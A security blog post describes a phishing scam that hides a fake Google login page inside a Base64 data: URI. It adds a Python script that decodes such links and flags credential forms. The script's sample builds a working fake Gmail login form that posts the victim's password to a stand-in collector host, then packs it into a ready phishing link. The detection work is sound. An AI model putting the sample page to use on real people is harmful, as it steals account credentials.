Google Phishing Scam Uses a New Tactic

Sue Marquette Poremba

In what is becoming old news, passwords are under attack again. This time the passwords in question are those used for Google accounts. The attack takes the form of a sophisticated phishing scam, according to the BitDefender researchers who first discovered it. According to eSecurity Planet, this is what users receive:

A spam e-mail with the subject line "Mail Notice" or "New Lockout Notice" states, "This is a reminder that your email account will be locked out in 24 hours. Due to not being able to increase your Email storage Quota. Go to the INSTANT INCREASE to increase your Email storage automatically."

What makes this piece of spam unusually wicked is that the security methods that would normally block it can't catch it. The link in the message is not an ordinary URL pointing at a hosted page but a data URI: the phishing page itself is carried inside the link, so there is no malicious hostname or web address for a URL blocklist to match. A Help Net Security article went on to explain:

The data URI scheme allows scammers to include data in-line in Web pages as if they were external resources. The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake Web page in an encoded string within the data URI.
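To make the mechanism concrete, here is an added example (not code from the original post, from BitDefender, or from the articles quoted above) that builds a link the way the scammers do and then does what a mail filter would need to do to catch it: parse the data: URI per RFC 2397, Base64-decode the embedded page, and flag it if it contains a password field posting to a remote host. The fake login page and the collector hostname `collector.example.net` are constructed stand-ins for this demonstration, not artefacts from the real campaign.

```python
"""Parse data: URIs (RFC 2397) and flag ones that smuggle an HTML login form.

Constructed example: the phishing page and hostnames below were written for this
demonstration and are not taken from the actual campaign.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# data:[<mediatype>][;param...][;base64],<payload>
_DATA_URI = re.compile(
    r"^data:(?P<mediatype>[^,;]*)(?P<params>(?:;[^,;]+)*),(?P<payload>.*)$",
    re.DOTALL | re.IGNORECASE,
)
_HREF = re.compile(r'href\s*=\s*"([^"]+)"', re.IGNORECASE)


def decode_data_uri(uri):
    """Return (mediatype, decoded bytes) for a data: URI; raise ValueError otherwise."""
    m = _DATA_URI.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    mediatype = m.group("mediatype") or "text/plain"   # RFC 2397 default
    params = m.group("params").lower()
    payload = m.group("payload").strip()
    if ";base64" in params:
        # Browsers tolerate missing '=' padding; mirror that so we decode what they render.
        payload += "=" * (-len(payload) % 4)
        return mediatype, base64.b64decode(payload)
    return mediatype, unquote(payload).encode()


class _FormScanner(HTMLParser):
    """Collect <form action=...> targets and note whether any password input exists."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def classify_link(uri):
    """Classify one link as 'external', 'data-uri' or 'credential-form'.

    A data: URI whose decoded HTML carries a password field that posts to an
    http(s) host is the phishing signature described in the article: the page
    travels inside the mail, only the stolen credentials leave for a remote host.
    """
    if not uri.lower().startswith("data:"):
        return {"verdict": "external", "mediatype": None, "actions": []}
    mediatype, body = decode_data_uri(uri)
    result = {"verdict": "data-uri", "mediatype": mediatype, "actions": []}
    if not mediatype.lower().startswith("text/html"):
        return result
    scanner = _FormScanner()
    scanner.feed(body.decode("utf-8", errors="replace"))
    remote = [a for a in scanner.actions if urlparse(a).scheme in ("http", "https")]
    result["actions"] = remote
    if scanner.has_password and remote:
        result["verdict"] = "credential-form"
    return result


def scan_mail_body(html):
    """Return [(verdict, href)] for every href in a mail body; data: links carry no hostname."""
    return [(classify_link(h)["verdict"], h) for h in _HREF.findall(html)]


# --- constructed sample: what the attacker builds and what the victim receives ---
FAKE_LOGIN_PAGE = b"""<html><head><title>Gmail</title></head><body>
<form method="post" action="http://collector.example.net/harvest">
  Email: <input name="Email" type="text">
  Password: <input name="Passwd" type="password">
  <input type="submit" value="INSTANT INCREASE">
</form></body></html>"""

PHISHING_LINK = "data:text/html;base64," + base64.b64encode(FAKE_LOGIN_PAGE).decode()

SPAM_BODY = (
    '<p>This is a reminder that your email account will be locked out in 24 hours.</p>'
    '<a href="' + PHISHING_LINK + '">INSTANT INCREASE</a>'
)

if __name__ == "__main__":
    for verdict, href in scan_mail_body(SPAM_BODY):
        print(verdict, href[:40] + "...")
```

Note that a hostname blocklist never gets a chance here: `urlparse` of the link itself yields no netloc, and the only remote host in the whole message is buried inside the Base64 blob, which is exactly why decoding the payload before inspection is the check that matters.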

Google Chrome's address bar doesn't show the entire encoded string, so even the most vigilant users will have trouble spotting the problem: there is no familiar hostname to check, just an opaque run of Base64. Oh yeah, and it isn't just Google Chrome that is affected; Firefox users are also at risk from this scam. (This news, on top of the recent problems for every version of Internet Explorer, makes me wonder how anyone can surf the Internet securely these days.)

It’s not hard to figure out why this phishing scam is so alarming. It isn’t only because it is so tricky and devious and hard to detect. It is also because of what the hackers will have access to if they grab your Google password. As Catalin Cosoi, chief security strategist at BitDefender, said in a CSO article:

…With access to a person's Google account, criminals could do all sorts of things - from purchasing apps on Google Play, to compromising email and documents, or expanding the attack to the victim's social circle via email or Google+.

Let’s not forget about hackers gaining access to sensitive work files that may be stored in Google Drive.

But what I didn’t see mentioned was how or if this will affect Android devices, and I think that’s an important question that needs to be answered.
